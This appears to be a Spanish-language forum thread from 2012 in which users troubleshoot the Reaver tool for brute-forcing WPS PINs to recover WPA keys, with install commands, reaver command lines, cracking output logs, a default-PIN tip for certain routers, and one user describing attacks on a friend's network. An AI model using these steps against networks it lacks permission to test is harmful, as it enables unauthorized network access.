Publicado por: P4nd3m0n1um en 15 Marzo 2012, 19:59 pm
yo no puedo descomprimirlo... algun problema para correrlo en backtrack5? de momento ya te digo q ni lo descomprime, se queda colgado...

para back|track tenes en los repositorios:

Código:
apt-get install reaver

o

Código:
apt-get install reaver-wps

o en un terminal:

Código:
svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps-read-only

si no comienza a descargar y da error instala svn. luego:

Código:
cd reaver-wps-read-only

Código:
cd src

Código:
./configure

Código:
make

Código:
make install

estando conectado.

el modulo de wifiway se puede extraer con el 7zip yo hice un par de módulos en windows..


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Borito30 en 18 Marzo 2012, 12:42 pm
por el momento ya va bien la instalacion


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: canastero en 20 Marzo 2012, 16:25 pm
haber si alguien me dice si ago algo mal o esta bien todo y no da la contraseña solo me da el pin.La red la proprciona una compañia de andalucia la Mac comienza por 00:1D:CE:2A:XX:XX nombre de la red ARRIS-XXXX router ARRIS

+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[!] WARNING: 25 successive start failures
  • Sending EAPOL START request
  • [!] WPS transaction failed, re-trying last pin
  • Trying pin 01255676
  • Sending EAPOL START request
  • Sending identity response
  • Sending M2 message
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending M2D message
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending WSC ACK
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WPS transaction failed, re-trying last pin
  • Key cracked in 193 seconds
  • WPS PIN: '01255676'
  • Nothing done, nothing to save.
wifiway ~ #       

Un saludo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 20 Marzo 2012, 17:51 pm
usa la etiqueta CODE:

Código:
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[!] WARNING: 25 successive start failures
[+] Sending EAPOL START request
[!] WPS transaction failed, re-trying last pin
[+] Trying pin 01255676
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending M2 message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M2D message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending WSC ACK
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WPS transaction failed, re-trying last pin
[+] Key cracked in 193 seconds
[+] WPS PIN: '01255676'
[+] Nothing done, nothing to save.
wifiway ~ #      

1.- estas en wifiway, en que wifiway? y con que versión de reaver-wps? cargaste el modulo de la nueva versión?
2.- que calidad de señal tiene el router? wash te ha dado que tiene WPS activado?
3.- se ven errores algo graves:

Código:
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message

se envía el mensaje M2, el router contesta pero reaver no le entiende. Re-envía el mensaje, pero ojo envía un M2D??? cosa que desconozco que es. Segun la pagina de issue de reaver:

Cita de: project member
The AP is vulnerable, but the received signal strength (RSSI) is almost -90dbm. This is very low. You will need to get closer to the AP or boost your signal with a directional antenna in order to perform this attack.

Cita de: project member
El AP es vulnerable pero la señal (RSSI) es igual o menor a -90dbm. Esto es muy bajo. Usted tendrá que estar más cerca del punto de acceso o mejorar la señal con una antena direccional con el fin de llevar a cabo este ataque.

Código:
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred

quiere decir que se envió el EAPOL pero el router no respondió, por lo tanto esta en timeout!

Código:
[!] WPS transaction failed, re-trying last pin

esto quiere decir que probo un pin y el router no contesto a tiempo o no respondió nada.

simplemente el pin es erróneo o el router se bloqueo o se defiende, trata de hacer el ataque por pin como mostré post antes y pon -p 0125 y vemos sino lanza todo de nuevo, ha y si y tienes el reaver viejo, actualizalo.

El ataque debería ser limpio sin errores:

Código:
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Switching mon0 to channel 1
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: XXXX)
[+] Trying pin XXXXXXXX
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending M2 message
[+] Sending M4 message
[+] Sending M6 message
[!] WPS transaction failed, re-trying last pin
[+] Key cracked in 5 seconds
[+] WPS PIN: 'XXXXXXXX'
[+] WPA PSK: 'XXXXXXXXXXXXXX'
[+] AP SSID: 'XXXXXXXX'
[+] Nothing done, nothing to save.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: canastero en 20 Marzo 2012, 20:26 pm


Buenas estoy en wifiway 3.4 uso reaver 1.4 es mismo que se ve en tu codigo.El router lo tengo a unos 10 metros me llega la señal exelente asi que ese no es el caso.El reaver wps no escanea nada no me sale nada y si esta activado el wps aparte lo comprobe con wireshark y me da (0x02) por lo que e leido y visto eso quiere decir que si esta activado.Ah si cargue el nuevo modulo.Bueno muchas gracias por ayudarme cuando pruebe con el pin que me dices ya te comento que tal fue todo.

Un Saludo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: canastero en 21 Marzo 2012, 13:21 pm

Buenas he probado con ese pin y no busca desde 0 salta siempre el mismo pin y termina igual que antes.
Lo que are es comenzar de nuevo y haber que tal funciona asi.
Me sale el error de M2D que nose que es y tras ese error me sale M6 y vuelta al mismo pin hasta que termina y solo me da el pin pero no la contraseña..

Un saludo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 25 Marzo 2012, 09:12 am
Para los que tengan problemas con Reaver-WPS en WifiWay 3.4, lea esto:

http://foro.elhacker.net/wireless_en_linux/wpscrackgui_v115_24032012-t352541.0.html;msg1731169#msg1731169 (http://foro.elhacker.net/wireless_en_linux/wpscrackgui_v115_24032012-t352541.0.html;msg1731169#msg1731169)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: mestisot en 7 Abril 2012, 15:17 pm
Estoy probando de poner estos comandos

Airodump-ng mon0 -w wps-test --beacons -- 7 --bssid 00:xxxxxx

Y me sale este mensaje, "airodump-ng --help" for help.
Eso que significa??


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 7 Abril 2012, 16:13 pm
Estoy probando de poner estos comandos

Airodump-ng mon0 -w wps-test --beacons -- 7 --bssid 00:xxxxxx

Y me sale este mensaje, "airodump-ng --help" for help.
Eso que significa??

no existe la función wps-test en airodump-ng.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: mestisot en 7 Abril 2012, 16:27 pm
Pues es lo que sale es el menú del cabezal...
# airodump-ng mon0 -w wps-test --beacons --chanel NUMERO --bssid ELQUETENGO
Sí no se pone test, que ponemos?
y luego otra duda, estoy haciendo este comando, #walsh -i mon0
Y no me sale nada de nada, no debería de salir mi red, además de todas las demás?
Que jaleo...
Decir que estoy utilizando wifiway 3.4.
Gracias


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 7 Abril 2012, 16:40 pm
Pues es lo que sale es el menú del cabezal...
# airodump-ng mon0 -w wps-test --beacons --chanel NUMERO --bssid ELQUETENGO
Sí no se pone test, que ponemos?
y luego otra duda, estoy haciendo este comando, #walsh -i mon0
Y no me sale nada de nada, no debería de salir mi red, además de todas las demás?
Que jaleo...
Decir que estoy utilizando wifiway 3.4.
Gracias

airodump-ng no tiene soporte para wps, la opción -w es para grabar un archivo, estas grabando un archivo llamado wps-test, pero al indicar mon0, debes hacerlo como -i mon0.

si usas wash, solamente te saldrán las redes que sean WPA/WPA2 con WPS Activado.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: mestisot en 7 Abril 2012, 16:58 pm
Entonces, sí solo saldrán las que tienes activadas, la mía no lo esta!!
Lo raro, es que ninguna wpa lo este, no??
Decir que donde estoy yo habrán unas 15 señales wpa.
Lo veo raro, que ninguna lo éste.
Puede que haga algo mal.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 7 Abril 2012, 17:01 pm
Entonces, sí solo saldrán las que tienes activadas, la mía no lo esta!!
Lo raro, es que ninguna wpa lo este, no??
Decir que donde estoy yo habrán unas 15 señales wpa.
Lo veo raro, que ninguna lo éste.
Puede que haga algo mal.

actualizaste el reaver-wps? el que viene por defecto en wifiway es muy inestable he inservible.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: mestisot en 7 Abril 2012, 17:36 pm
Pero cómo lo actualizo??
es un cd live, cómo se hace??


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 7 Abril 2012, 18:35 pm
Pero cómo lo actualizo??
es un cd live, cómo se hace??
para back|track tenes en los repositorios:

Código:
apt-get install reaver

o

Código:
apt-get install reaver-wps

o en un terminal:

Código:
svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps-read-only

si no comienza a descargar y da error instala svn. luego:

Código:
cd reaver-wps-read-only

Código:
cd src

Código:
./configure

Código:
make

Código:
make install

estando conectado.

el modulo de wifiway se puede extraer con el 7zip yo hice un par de módulos en windows..


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: mestisot en 7 Abril 2012, 19:11 pm
Eso sí, pero cómo hago para poner el código wifi para poder descargar esto?
Imagino que antes de poner la tarjeta wifi en modo monitor, tendré que descargar esto!!
Luego, donde se guarda??
Y lo más estaño, donde lo instala, ya que utilizo un live cd.
 :(
Pero lo que no se, es cómo pongo la contraseña wifi??
Jajaja no s encontrar donde están todas las redes...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 7 Abril 2012, 19:37 pm
Eso sí, pero cómo hago para poner el código wifi para poder descargar esto?
Imagino que antes de poner la tarjeta wifi en modo monitor, tendré que descargar esto!!
Luego, donde se guarda??
Y lo más estaño, donde lo instala, ya que utilizo un live cd.
 :(
Pero lo que no se, es cómo pongo la contraseña wifi??
Jajaja no s encontrar donde están todas las redes...

primero tienes que saber que no existe codigos wifi.
segundo tienes que saber que es un live cd y como trabaja:

Cita de: la Wikipedia
Una distribución live o Live CD o Live DVD, más genéricamente Live Distro, traducido en ocasiones como CD vivo o CD autónomo, es un sistema operativo almacenado en un medio extraíble, tradicionalmente un CD o un DVD (de ahí sus nombres), que puede ejecutarse desde éste sin necesidad de instalarlo en el disco duro de una computadora, para lo cual usa la memoria RAM como disco duro virtual y el propio medio como sistema de archivos.

por ende la instalación se realizara en la RAM, cosa que cuando apagues se borrara, utilizando un terminal:

Cita de: la Wikipedia
Un terminal de texto, o a menudo solo terminal (a veces cónsola de texto) es un un terminal con una interface serial para comunicarse con un computador, un teclado para entrada de datos y una pantalla para exhibición de únicamente caracteres alfanuméricos (sin gráficos). La información es presentada como un arreglo de caracteres preseleccionados.

he insertando las ordenes especificas:

Código:
svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps-read-only
cd reaver-wps-read-only
cd src
./configure
make
make install

podríamos lograr la instalación satisfactoria de la ultima versión de nuestro programa:

Cita de: la Wikipedia
Un programa informático es un conjunto de instrucciones que una vez ejecutadas realizarán una o varias tareas dictadas por el programador en una computadora. Sin programas, estas máquinas no pueden funcionar. Al conjunto general de programas, se le denomina software, que más genéricamente se refiere al equipamiento lógico o soporte lógico de una computadora digital.

ahora si bien tenemos nuestro programa podemos usarlo para beneficiarnos con los conocimientos del programador que lo programo.

Pero lo que no se, es cómo pongo la contraseña wifi??

Cita de: la Wikipedia
Una contraseña o clave (en inglés password) es una forma de autentificación que utiliza información secreta para controlar el acceso hacia algún recurso. La contraseña debe mantenerse en secreto ante aquellos a quien no se les permite el acceso. A aquellos que desean acceder a la información se les solicita una clave; si conocen o no conocen la contraseña, se concede o se niega el acceso a la información según sea el caso.

de seguro te has de referir a la contraseña de tu red wifi:

Cita de: la Wikipedia
Wi-Fi (/waɪfaɪ/; en algunos países hispanoparlantes /wɪfɪ/) es un mecanismo de conexión de dispositivos electrónicos de forma inalámbrica. Los dispositivos habilitados con Wi-Fi, tales como: un ordenador personal, una consola de videojuegos, un smartphone o un reproductor de audio digital, pueden conectarse a Internet a través de un punto de acceso de red inalámbrica. Dicho punto de acceso (o hotspot) tiene un alcance de unos 20 metros (65 pies) en interiores y al aire libre una distancia mayor. Pueden cubrir grandes áreas la superposición de múltiples puntos de acceso .

hay varios gestores de conexión para conectarte en wifiway:

Cita de: la Wikipedia
Wifiway es una distribución GNU/Linux pensada y diseñada para la auditoría de seguridad de las redes WiFi, Bluetooth y RFID.

Jajaja no s encontrar donde están todas las redes...

Cita de: la Wikipedia
Denominamos cohesión al conjunto de procedimientos microtextuales que permiten organizar las ideas expuestas en un texto. Se relaciona, a su vez, con la coherencia y pertenece al ámbito de estudios del análisis del discurso y la lingüística del texto. También es la propiedad por la cual los enunciados de un texto se relacionan correctamente desde un punto de vista léxico y gramatical. La cohesión se pone de manifiesto en los textos por medio de dos procedimientos: el léxico y el gramatical.

Cita de: la Wikipedia
La coherencia es una propiedad de los textos bien formados que permite concebirlos como entidades unitarias, de manera que las diversas ideas secundarias aportan información relevante para llegar a la idea principal, o tema, de forma que el lector pueda encontrar el significado global del texto. Así, del mismo modo que los diversos capítulos de un libro, que vistos por separado tienen significados unitarios, se relacionan entre sí, también las diversas secciones o párrafos se interrelacionan para formar capítulos, y las oraciones y frases para formar párrafos. La coherencia está estrechamente relacionada con la cohesión; con la diferencia de que la coherencia es un procedimiento macrotextual y la cohesión es un procedimiento microtextual.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: mestisot en 7 Abril 2012, 21:22 pm
Eiii gracias por la información, ahora ya se que sí se puede descargar.
Lo que aún no mee quedo claro es donde encontrar mi wifi para poder conectarme a ella, ya que en el desplegable hay un puñao de cosas y no hay manera de encontrar las wifis...
Sabes en.donde están las señales wifi??
De esta manera podre descargar s esto.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 8 Abril 2012, 20:47 pm
Eiii gracias por la información, ahora ya se que sí se puede descargar.
Lo que aún no mee quedo claro es donde encontrar mi wifi para poder conectarme a ella, ya que en el desplegable hay un puñao de cosas y no hay manera de encontrar las wifis...
Sabes en.donde están las señales wifi??
De esta manera podre descargar s esto.

en el menú de wifiway hay un sub-menú de gestores de red/conexion.. usa el wicd y te conectas..

por otra parte que raro que mister_x no le dio el mas mínimo soporte a wps...

http://trac.aircrack-ng.org/svn/trunk/src/airodump-ng.h
http://trac.aircrack-ng.org/svn/trunk/src/airodump-ng.c

muy raro...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: mestisot en 11 Abril 2012, 10:56 am
Hola de nuevo, estoy intentando poner mi clave wifi para poder actualizar el reaver y no hay manera.
La pongo y luego me dice bad password!!!
Decir que no estoy en modo monitor .
Porque sucede??

Edito....después de unos cuantos intentos ya se me conecto a la red, ahora vete de actualizar esto.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: mestisot en 11 Abril 2012, 11:45 am
No lo entiendo, pongo walsh -i mon0 y no me sale nada de nada!!!


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ChimoC en 12 Abril 2012, 09:54 am
Buenas:

@mestisot: es wash y no walsh (el progrma se llamaba waLsh hace bastante tiempo, ahora es wash)

Saludos

ChimoC


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: mestisot en 12 Abril 2012, 13:35 pm
Gracias, pero no se como lo hacéis, pero no tengo ni idea...
Ahora con wash salen redes, la mía no, no se porque, pero mejor, no??
Eso si, salían tres y una a de mi colega, así que quise sacarla para comentarle que cambie el código, pero es que me es imposible,a la hora de ejecutar este comando:
Reaver -i mon0 -b C4:3D:C7:XXXXXXXX -vv
Ya me dice que cambie él mon0 por cada canal que sale...
No es normal!!
Alguna ayudita,please
Me encantaría aprender, pero asee me resiste todo esto.
Gracias. 
Ahhhhh
Referente a la wifi del colega ya lee puedo decir que la cambie, tasa que me acaban e pasar una apk de android "router keigen" que se ve que descifra la clave wifi de origen y justamente me dio la suya!!!
Muy fácil, pero seguro que son la de origen...
Que hago mal con él reaver??


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: mestisot en 13 Abril 2012, 10:50 am
Ouffff lo dejo por imposible!!!
Cuando pongo walsh -i mon0 no sale ninguna red
Ni tampoco con wash......
Luego con él reaver...... Como esta en él ejemplo, tampoco


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 14 Abril 2012, 02:29 am
Ouffff lo dejo por imposible!!!
Cuando pongo walsh -i mon0 no sale ninguna red
Ni tampoco con wash......
Luego con él reaver...... Como esta en él ejemplo, tampoco

porque no tenes el reaver ni el wash que viene con el reaver.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: mestisot en 14 Abril 2012, 08:29 am
Citar
porque no tenes el reaver ni el wash que viene con el reaver.
no te entendi,pero esp,que no mehace nada de nada.
no captura señal de ninguna red... :huh:


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: mestisot en 14 Abril 2012, 17:33 pm
Estoy probando él reaver por vigésima vez y me sale un error que dice que ha fallado la associate con la bssid, es normal??


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: mestisot en 14 Abril 2012, 18:18 pm
Ahora me asocia la de un colega pero no para de salirme información en vertical, también decir que hay muchos warning, además e un porcentaje que no sube del 0%
También un wps transacción failed code 0x02 retring las ping
Esto es normal??


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: silver_dh en 25 Abril 2012, 04:41 am
hola buenas, estoy interesado en este tema, y quiero saber un par de cosas que no tengo ni idea de si lo estoy haciendo bien o si mi tarjeta no es compatible, bueno explico el tema un poco:

mi tarjeta segun dice aqui, es:

wlan0 Ralink RT2870/3070 rt2800usb - [phy0]

y e visto en un comentario anterior que ese driver no sirve o que se puede arreglar haciendo nose que, ahora mi pregunta es, es compatible mi tarjeta para estos ataques de reaver? porque lo he intentado de varias formas y siempre o se me queda bloqueado, o se queda 0.00%, o pone siempre el mismo pin 12345670, o no se asocia, o se queda en timeout.(esto lo hice con la red de mi hermano con su permiso claro para estudiar como va asi le pongo proteccion y seguridad a mi red bajo ese sistema, aunque se que desactivandolo es facil pero aun asi quiero aprenderlo xD) bueno, necesito algun tipo de driver o algo para mi tarjeta? agradeceria la respuesta, el comando que uso es el siguiente:

reaver -i mon0 -b BSSID -vv -c (canal)

esta bien ese comando no? porque siempre me pasa lo mismo -.-


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: andres67 en 26 Abril 2012, 14:54 pm
Me puedes poner el enlace para descargar el modulo de actualizacion del reaver.
No lo encuentro descarge uno que pone firmwares-broacom.xzm. Que pesa 560 K.
Pero no se si es ese.Gracias.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 26 Abril 2012, 16:09 pm
hola buenas, estoy interesado en este tema, y quiero saber un par de cosas que no tengo ni idea de si lo estoy haciendo bien o si mi tarjeta no es compatible, bueno explico el tema un poco:

mi tarjeta segun dice aqui, es:

wlan0 Ralink RT2870/3070 rt2800usb - [phy0]

y e visto en un comentario anterior que ese driver no sirve o que se puede arreglar haciendo nose que, ahora mi pregunta es, es compatible mi tarjeta para estos ataques de reaver? porque lo he intentado de varias formas y siempre o se me queda bloqueado, o se queda 0.00%, o pone siempre el mismo pin 12345670, o no se asocia, o se queda en timeout.(esto lo hice con la red de mi hermano con su permiso claro para estudiar como va asi le pongo proteccion y seguridad a mi red bajo ese sistema, aunque se que desactivandolo es facil pero aun asi quiero aprenderlo xD) bueno, necesito algun tipo de driver o algo para mi tarjeta? agradeceria la respuesta, el comando que uso es el siguiente:

reaver -i mon0 -b BSSID -vv -c (canal)

esta bien ese comando no? porque siempre me pasa lo mismo -.-

rt2800 no es compatible con reaver-wps.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 26 Abril 2012, 16:17 pm
Me puedes poner el enlace para descargar el modulo de actualizacion del reaver.

lo encontras en seguridadwireless.net

No lo encuentro descarge uno que pone firmwares-broacom.xzm. Que pesa 560 K.
Pero no se si es ese.Gracias.

ese es un filmware de un dispositivo broacom.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: andres67 en 26 Abril 2012, 18:59 pm
Haber puede ser este ( reaver-1.4- final.xzm  100kB del 24-01-12.)
Lo descarge de downloadwireless.net.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 26 Abril 2012, 22:23 pm
Haber puede ser este ( reaver-1.4- final.xzm  100kB del 24-01-12.)
Lo descarge de downloadwireless.net.

ese es el q viene con el wifiway creo..


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: andres67 en 28 Abril 2012, 01:48 am
No quiero mezclar, pero leyendo tus otros post .Mejor bajo modulo wpscrakGUi que tiene reaver incluido y actualizado.Y ya te comento.

Gracias por tu tiempo.

Desde el punto y la coma en el pais de la paciencia y del buen hacer ,gracias de nuevo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: jose46lopez en 28 Abril 2012, 02:49 am
Al escribir el comando -p y el numero (4 o 8 digitos), algunas redes se quedan ahi probando el mismo pin siempre y no hay manera, mientras que si atacas normal, si que avanza. Hablo tanto de wpscrackgui como de reaver actualizados. Saludos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 28 Abril 2012, 02:59 am
Al escribir el comando -p y el numero (4 o 8 digitos), algunas redes se quedan ahi probando el mismo pin siempre y no hay manera, mientras que si atacas normal, si que avanza. Hablo tanto de wpscrackgui como de reaver actualizados. Saludos.

cuando especificas los pines por ejemplo 0123 el reaver no comenzara utilizando el diccionario principal de XXXX, sino que tomara por asegurados los primeros dijitos, al poner 01234567 solamente probara ese pin.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: jose46lopez en 28 Abril 2012, 23:11 pm
cuando especificas los pines por ejemplo 0123 el reaver no comenzara utilizando el diccionario principal de XXXX, sino que tomara por asegurados los primeros dijitos, al poner 01234567 solamente probara ese pin.
Creo que no me entiendes. Se que cuando escribes los 8 digitos solo prueba esos 8. Cuando pongo 4 digitos, imagina 0123, y empieza a probar 01235678 (pejemplo) y ahi se queda probando lo mismo una y otra vez sin cambiar los 4 ultimos. Pasa en algunas redes no en todas. No se a que se debera.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: kupu88 en 30 Abril 2012, 19:52 pm
Hola:
Alguien me podria decir en que porcentage le a funcionado el Reaver.
Por que a mi, ya probe un pocos routers (legalmente), y solo me funciono con uno.

En mi caso solo me ha funcionado en el 5% de los casos.
¿y a vosotros?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 30 Abril 2012, 20:42 pm
Hola:
Alguien me podria decir en que porcentage le a funcionado el Reaver.
Por que a mi, ya probe un pocos routers (legalmente), y solo me funciono con uno.

En mi caso solo me ha funcionado en el 5% de los casos.
¿y a vosotros?

depende del pin el %.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: kupu88 en 1 Mayo 2012, 00:35 am
Pero si el ataque de Reaver funciona, el pin acaba saliendo, sea cual sea... ¿no?
Por lo que el pin no debia influir.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 1 Mayo 2012, 23:30 pm
al 5 % como ? yo lo intentado con wpscragui Y  mi como mucho me llega al 90 por ciento con las orange o incluso menos por que siempre se bloquea si alguien a intento sacar alguna Orange con este programa que me lo diga por favor por que yo demomento no he sacado niguna Orange-xxxx ni con el reaber ni con el wpscragui siempre se bloquea si podeis mejorar algo de este programa sera lo suyo pienso yo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 1 Mayo 2012, 23:46 pm
Pero si el ataque de Reaver funciona, el pin acaba saliendo, sea cual sea... ¿no?
Por lo que el pin no debia influir.

Reaver-WPS cuenta los espacios que tiene en el diccionario, en total son 10.000 por dar un ejemplo. si estamos probando el pin 5.000 estamos al 50% del ataque, al momento de llegar al 90% no es que llegamos al 90% real ya que no es un diccionario normal, sino que hemos capturado los primeros 4 dígitos, luego el siguiente 10% se lo dedica a los próximos 3 dígitos y el ultimo lo hace automáticamente.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: maikyKTM en 7 Mayo 2012, 17:44 pm
Buenas a todos, primero presentarme, que es la primera vez que escribo, aunque os llevo tiempo siguiendo, igual que a los compañeros de SeguridadWireless.

   Haber si alguien lo ha podido solucionar, hablo de los router con MAC 00:19:15:xx:xx:xx, segun he leido:

Contra los routers con MAC 00:19:15:XXXXXX de WLAN_XXXX el pin por defecto es 12345670 y la clave salta en cuestión de segundos

A partir de reaver 1.4 el primer pin que prueba es 12345670, con versiones anteriores lo puedes poner a mano

reaver -i mon0 -b BSSID -p 12345670 -vv


   Llevo probando varios dias, y no hay manera, siempre me sale:

WARNING: Receive timeout occurred
   
   Y lo tengo a 2 metros, por lo que he leido a mas gente le pasa lo mismo con Reaver 1.4 y estos Router.
   Haber si alguien me puedo dar luz en este tema,

   Muchas gracias.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Lord_Othar en 7 Mayo 2012, 22:46 pm
He leido el hilo entero pero hay algunas cosas que no me quedan claras o por lo menos no se mencionan.

- Una vez sacado el wps pin, se supone que tenemos acceso por la puerta de enlace estando asociados previamente según ha comentado un compañero.

La pregunta es: si para poder asociarnos al router necesitamos la clave de red, como nos asociamos teniendo el wps pin?

desde ya gracias, un saludo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 8 Mayo 2012, 03:28 am
He leido el hilo entero pero hay algunas cosas que no me quedan claras o por lo menos no se mencionan.

- Una vez sacado el wps pin, se supone que tenemos acceso por la puerta de enlace estando asociados previamente según ha comentado un compañero.

La pregunta es: si para poder asociarnos al router necesitamos la clave de red, como nos asociamos teniendo el wps pin?

desde ya gracias, un saludo.

te asocias con la WPA, el pin lo tenes nomas para sacar la clave.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ragtap en 8 Mayo 2012, 18:06 pm
Buenas a todos, primero presentarme, que es la primera vez que escribo, aunque os llevo tiempo siguiendo, igual que a los compañeros de SeguridadWireless.

   Haber si alguien lo ha podido solucionar, hablo de los router con MAC 00:19:15:xx:xx:xx, segun he leido:

Contra los routers con MAC 00:19:15:XXXXXX de WLAN_XXXX el pin por defecto es 12345670 y la clave salta en cuestión de segundos

A partir de reaver 1.4 el primer pin que prueba es 12345670, con versiones anteriores lo puedes poner a mano

reaver -i mon0 -b BSSID -p 12345670 -vv


   Llevo probando varios dias, y no hay manera, siempre me sale:

WARNING: Receive timeout occurred
   
   Y lo tengo a 2 metros, por lo que he leido a mas gente le pasa lo mismo con Reaver 1.4 y estos Router.
   Haber si alguien me puedo dar luz en este tema,

   Muchas gracias.

A mi me pasa exactamente lo mismo... sera por el adaptador? yo uso el Alfa RT8187


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Lord_Othar en 8 Mayo 2012, 21:43 pm
te asocias con la WPA, el pin lo tenes nomas para sacar la clave.

exacto, es lo que pensaba, creo que el comentario que leí en el hilo estaba equivocado y daba a entender que te asociabas con el wps pin.

Entonces teniendo el wps pin, cual es el siguiente paso para poder acceder al router (y acceder al wpa key)?

gracias por la ayuda @P4nd3m0n1um

un saludo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 9 Mayo 2012, 01:43 am
Entonces teniendo el wps pin, cual es el siguiente paso para poder acceder al router (y acceder al wpa key)?

crackeas la WPA y entras.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ChimoC en 9 Mayo 2012, 09:52 am
Buenas:

POr favor, estoy leyendo muchos mensajes que a las claras se ve que quieren reventar redes..... los próximos los borraré

ChimoC


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 9 Mayo 2012, 23:51 pm
Pues yo he leido también los mensajes chimoc y no se por que piensas que kieren reventar redes solo están preguntando no se donde esta la prueba la verdad encima que se llama la pagina hacker la verdad que algunas veces no lo entiendo la verdad.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ChimoC en 10 Mayo 2012, 10:06 am
Buenas:

@elsevi: Si no estás conforme con mi decisión se lo indicas a los moderadores Globales, o a los CoAdmin o Admin

Saludos

ChimoC


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 11 Mayo 2012, 02:48 am
